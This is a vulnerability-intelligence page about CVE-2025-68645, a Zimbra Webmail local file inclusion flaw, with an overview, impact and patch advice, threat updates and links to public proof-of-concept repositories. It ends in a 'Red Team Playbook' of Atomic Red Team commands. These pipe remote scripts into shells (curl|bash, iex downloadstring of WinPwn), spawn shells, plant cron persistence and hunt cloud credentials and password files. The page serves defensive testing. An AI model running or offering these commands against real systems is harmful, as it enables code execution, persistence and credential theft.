CVE-2025-68645
Overview
This vulnerability is a Local File Inclusion (LFI) flaw caused by improper validation and sanitization of user-supplied parameters within the RestFilter servlet of the Webmail Classic UI in Zimbra Collaboration Suite versions 10.0 and 10.1. The servlet fails to correctly handle request parameters, allowing manipulation of internal request dispatching logic. This flaw affects the /h/rest endpoint, enabling unauthorized access to internal file inclusion mechanisms within the WebRoot directory.
Vulnerability Description
A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.
Impact
An unauthenticated remote attacker can exploit this vulnerability to include and read arbitrary files from the WebRoot directory, potentially exposing sensitive configuration files, credentials, or other confidential data. No user interaction or authentication is required to perform the attack. This can lead to information disclosure that compromises the confidentiality of the affected system and may facilitate further attacks such as privilege escalation or lateral movement within the network.
Solution
Zimbra has published security advisories accessible via their Security Center wiki that provide patch information and responsible disclosure guidance. Administrators should upgrade affected Zimbra Collaboration Suite installations to versions beyond 10.1 where the issue is resolved. Detailed remediation steps and patch releases are documented at https://wiki.zimbra.com/wiki/Security_Center and the Zimbra Responsible Disclosure Policy page. Applying vendor-provided updates and following their recommended patching procedures is essential to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Local File Inclusion (LFI) vulnerability in the Webmail Classic UI of Zimbra Collaboration Suite versions 10.0 and 10.1 arises from inadequate validation of user-supplied request parameters within the RestFilter servlet. This flaw allows an attacker to manipulate requests sent to the /h/rest endpoint, potentially leading to the inclusion of arbitrary files from the WebRoot directory. The vulnerability stems from the application's failure to properly sanitize input, enabling an attacker to craft malicious requests that can access sensitive files on the server. This misconfiguration can expose critical system files, configuration files, or even user data, depending on the server's file structure and permissions.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated remote attacker can initiate a crafted request to the vulnerable endpoint, effectively bypassing any authentication mechanisms that may be in place. Once the attacker successfully includes a file, they can leverage the information contained within it to escalate their attack, potentially leading to further exploitation of the system or lateral movement within the network. For example, an attacker might include configuration files that contain database credentials or other sensitive information, which could then be used to gain deeper access to the system or to pivot to other connected systems.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Zimbra Collaboration Suite for their email and collaboration needs. The CVSS score of 8.8 indicates a high severity level, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of confidentiality, and potential regulatory penalties. Businesses may face reputational damage, loss of customer trust, and financial repercussions due to the exposure of sensitive information. Additionally, the vulnerability could serve as a gateway for more sophisticated attacks, increasing the overall risk profile for organizations that fail to address it promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing should be conducted to identify and remediate weaknesses in the application. Employing web application firewalls (WAFs) can help filter and monitor HTTP requests, blocking potentially malicious input before it reaches the application. Furthermore, developers should adhere to secure coding practices, ensuring that user input is properly validated and sanitized. Keeping the Zimbra Collaboration Suite up to date with the latest security patches is crucial, as updates often include fixes for known vulnerabilities.
In conclusion, the Local File Inclusion vulnerability in Zimbra Collaboration Suite poses a serious threat to organizations using this platform. The potential for unauthorized access to sensitive files and the subsequent risks associated with data breaches necessitate immediate attention. By understanding the technical details, potential attack vectors, and implementing effective detection and mitigation strategies, organizations can significantly reduce their exposure to this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-68645, with telemetry indicating a significant uptick in exploit attempts targeting the Zimbra Collaboration Suite’s Webmail Classic UI. This increase coincides with a modest rise in the Exploit Prediction Scoring System (EPSS) score, reflecting growing confidence in the exploitability of this Local File Inclusion vulnerability. The emergence of multiple new proof-of-concept exploits on public repositories further amplifies the risk by lowering the barrier for adversaries to develop and deploy attacks. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanding exploit landscape and heightened detection trends suggest an elevated threat posture. For defenders, this means increased vigilance is warranted as exploitation attempts may become more frequent and sophisticated, potentially leading to unauthorized access to sensitive internal files. Consequently, the overall risk rating for CVE-2025-68645 should be considered elevated, underscoring the urgency for continuous monitoring and proactive threat detection efforts.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-68645, evidenced by a noticeable uptick in detection activity across our sensors. This increase coincides with the emergence of additional publicly available proof-of-concept exploits, broadening the toolkit accessible to threat actors and lowering the barrier for exploitation. Despite a slight decline in the EPSS score, the overall threat environment has intensified due to these qualitative shifts. The expanding exploit landscape suggests adversaries are actively refining and disseminating attack methods, which could lead to more frequent and varied attempts to leverage the Local File Inclusion vulnerability in Zimbra Collaboration Suite. For defenders, this evolving scenario underscores a heightened risk of unauthorized access to sensitive internal files, necessitating sustained vigilance. Consequently, the risk level associated with CVE-2025-68645 should be considered elevated, reflecting an increased likelihood of exploitation in the near term.
Update 3 — June 20, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2025-68645, accompanied by a continued decline in the EPSS score. This divergence suggests that while adversaries are incrementally intensifying their probing activities, the overall likelihood of widespread exploitation is diminishing, potentially reflecting improved defensive postures or reduced attacker prioritization. Additionally, new proof-of-concept exploits have surfaced across multiple public repositories, indicating sustained interest and ongoing refinement of attack techniques within the threat actor community. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanding availability of exploit code lowers the barrier for opportunistic attackers to leverage the Local File Inclusion flaw. Consequently, the threat landscape for CVE-2025-68645 remains dynamic, warranting close monitoring. The risk level should be viewed as moderately elevated due to persistent adversary engagement and the proliferation of exploit resources, despite the downward trend in predictive exploit scoring.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xBlackash/CVE-2025-68645
CVE-2025-68645
|
0xBlackash | 2 | 1 | 2026-04-24 | View |
|
MaxMnMl/zimbramail-CVE-2025-68645-poc
CVE-2025-68645 - A Local File Inclusion (LFI) vulnerability in the Webmail Classic UI of Zimbra Collaboration
|
MaxMnMl | 3 | 0 | 2026-01-01 | View |
|
chinaxploiter/CVE-2025-68645-PoC
Academic proof-of-concept demonstrating CVE-2025-68645 for authorized security research.
|
chinaxploiter | 2 | 0 | 2025-12-30 | View |
|
HarisAidhin/Poc_CVE-2025-68645
Zimbra Path Traversal (CVE-2025-68645) - Unauthenticated file read vulnerability in Zimbra Collaboration Suite
|
HarisAidhin | 1 | 0 | 2026-05-06 | View |
|
Crow5-oss/CVE-2025-68645
|
Crow5-oss | 0 | 0 | 2026-02-21 | View |
|
its970/CVE-2025-68645
|
its970 | 0 | 0 | 2026-02-21 | View |
|
CMEGh0stX47/CVE-2025-68645
|
CMEGh0stX47 | 0 | 0 | 2026-02-21 | View |
|
faysalferdous/CVE-2025-68645-Exploiting-Zimbra-Webmail-LFI-Vulnerability
|
faysalferdous | 0 | 0 | 2026-02-10 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-193 | PHP Remote File Inclusion |
41%
|
High | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-68645 |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Security_Center |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-68645 |